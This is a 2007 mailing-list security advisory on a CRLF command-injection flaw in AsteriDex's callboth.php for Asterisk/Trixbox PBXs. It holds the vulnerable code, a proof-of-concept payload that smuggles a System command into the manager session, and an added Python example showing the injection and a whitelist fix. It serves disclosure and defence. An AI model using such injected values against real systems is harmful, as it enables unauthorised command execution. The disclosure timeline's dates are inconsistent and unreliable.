[UNIX] AsteriDex Code Execution (Asterisk and Trixbox)

Subject: [UNIX] AsteriDex Code Execution (Asterisk and Trixbox)
Date: 9 Jul 2007 15:44:33 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com

  AsteriDex Code Execution (Asterisk and Trixbox)
------------------------------------------------------------------------


SUMMARY

AsteriDex (http://bestof.nerdvittles.com/applications/asteridex/) is "a 
digital rolodex for Asterisk / Trixbox PBXs". It contains a command 
injection vulnerability that allows unauthenticated users to execute 
arbitrary commands on the Asterisk management console. Such access in turn 
permits execution of arbitrary operating system commands as the 'asterisk' 
user.

DETAILS

Vulnerable Systems:
 * AsteriDex version 3.0 and prior

The script 'callboth.php' is used by AsteriDex to bridge a VoIP call 
between two end-points. Insufficient parameter checking is done on the 
request variables IN and OUT, allowing a malicious user to inject arbitrary 
commands into the Asterisk management console.

The script works by logging into the manager console on port 5038/TCP on 
localhost. It then issues an 'Action: Originate' command which is used to 
set up the bridged call. The relevant code from callboth.php is:

  fputs ($fp, "Action: login\r\n");
  fputs ($fp, "Username: phpagi\r\n");
  fputs ($fp, "Secret: phpagi\r\n");
  fputs ($fp, "Events: off\r\n\r\n");
  sleep(1);
  fputs ($fp, "Action: Originate\r\n");
  fputs ($fp, "Channel: $IN\r\n");            // << Command injection
  fputs ($fp, "Context: custom-callboth\r\n");
  fputs ($fp, "Exten: $OUT\r\n");             // << Command injection
  fputs ($fp, "Priority: 1\r\n\r\n");

$IN is set from $_GET['IN'] with no sanity checking other than a length 
test: the string passed to $IN must be less than 100 characters, and that 
count includes the 'sip/' prefix prepended to $IN before the length check 
is made.

Given sane values of $IN=123, $OUT=321 and $CallerID=567, the session 
would look like this:

  Action: login
  Username: phpagi
  Secret: phpagi
  Events: off
  
  Action: Originate
  Channel: 123
  Context: custom-callboth
  Exten: 321
  Priority: 1

By including CRLF characters in $IN, an attacker can inject arbitrary 
commands into the data stream, hijacking the authenticated session to run 
commands of the attacker's choice. Take, for example, a $IN string 
containing:

  190@example.com\r\nApplication: System\r\nData: echo pwn3d > /tmp/hoku.txt\r\n

This would transform the session into:
  Action: login
  Username: phpagi
  Secret: phpagi
  Events: off
  
  Action: Originate
  Channel: 190@example.com
  Application: System
  Data: echo pwn3d > /tmp/hoku.txt
  
  Context: custom-callboth
  Exten: 321
  Priority: 1

This would use the call manager's 'System' functionality to execute 
user-supplied operating system commands, in this case writing the word 
"pwn3d" to a file called "/tmp/hoku.txt". The rest of the session would 
fail because the attacker has subverted the original 'Action', rendering 
the remaining commands meaningless to the manager.
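To make the header-splitting concrete, the following is an added Python example (not part of the advisory, and not AsteriDex's code) that serialises the Originate action the way callboth.php does, parses the result back the way the manager would, and shows a whitelist check that rejects the advisory's payload before it reaches the socket. The character whitelist, the 95-character limit and the Python reimplementation are assumptions of this example, not the vendor's patch.

```python
import re

# Constructed example, not code from AsteriDex. It mirrors the AMI framing used
# by callboth.php: each header is "Key: value\r\n" and a blank line ends the action.
CRLF = "\r\n"
# Assumed whitelist for the IN/OUT values: only characters a SIP channel or
# extension needs, no CR/LF or other control characters, and short enough to
# stay under the script's own 100-character cap once 'sip/' is prepended.
SAFE_PARAM = re.compile(r"^[A-Za-z0-9@._-]{1,95}$")

def encode_action(headers):
    """Serialise one AMI action from (key, value) pairs."""
    return "".join(f"{k}: {v}{CRLF}" for k, v in headers) + CRLF

def build_originate_unsafe(in_param, out_param):
    """What callboth.php does: the request parameters go straight into the frame."""
    return encode_action([
        ("Action", "Originate"), ("Channel", "sip/" + in_param),
        ("Context", "custom-callboth"), ("Exten", out_param), ("Priority", "1"),
    ])

def build_originate_safe(in_param, out_param):
    """Hardened form: reject any value that could split the header stream."""
    for name, value in (("IN", in_param), ("OUT", out_param)):
        if not SAFE_PARAM.fullmatch(value):
            raise ValueError(f"parameter {name} rejected: {value!r}")
    return build_originate_unsafe(in_param, out_param)

def parse_action(frame):
    """Parse the first action in a frame into a dict, as the manager would."""
    body = frame.split(CRLF + CRLF, 1)[0]
    return dict(line.split(": ", 1) for line in body.split(CRLF) if line)

# The advisory's payload, embedded here as a constructed test input.
INJECTED = "190@example.com\r\nApplication: System\r\nData: echo pwn3d > /tmp/hoku.txt\r\n"

def demo():
    """Return (sane headers, hijacked headers, whether the safe builder blocked it)."""
    sane = parse_action(build_originate_unsafe("123", "321"))
    hijacked = parse_action(build_originate_unsafe(INJECTED, "321"))
    try:
        build_originate_safe(INJECTED, "321")
        blocked = False
    except ValueError:
        blocked = True
    return sane, hijacked, blocked

if __name__ == "__main__":
    print(demo())
```

Parsing the hijacked frame shows the injected blank line ending the action early, so the original Context, Exten and Priority headers never belong to it, which is exactly why the rest of the session fails.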

Solution:
A patched version of AsteriDex is available from:
http://bestof.nerdvittles.com/applications/asteridex/

Disclosure Timeline:
06/25/2007 - Vendor contacted.
06/03/2007 - Vendor contacted again, response received. Details sent to 
vendor.
06/03/2007 - Patch issued and updated version available.
06/05/2007 - Advisory released.


ADDITIONAL INFORMATION

The information has been provided by Carl Livitt (carl@hoku.co.uk).
The original article can be found at:
http://www.hoku.co.uk/advisories/asteridex.txt


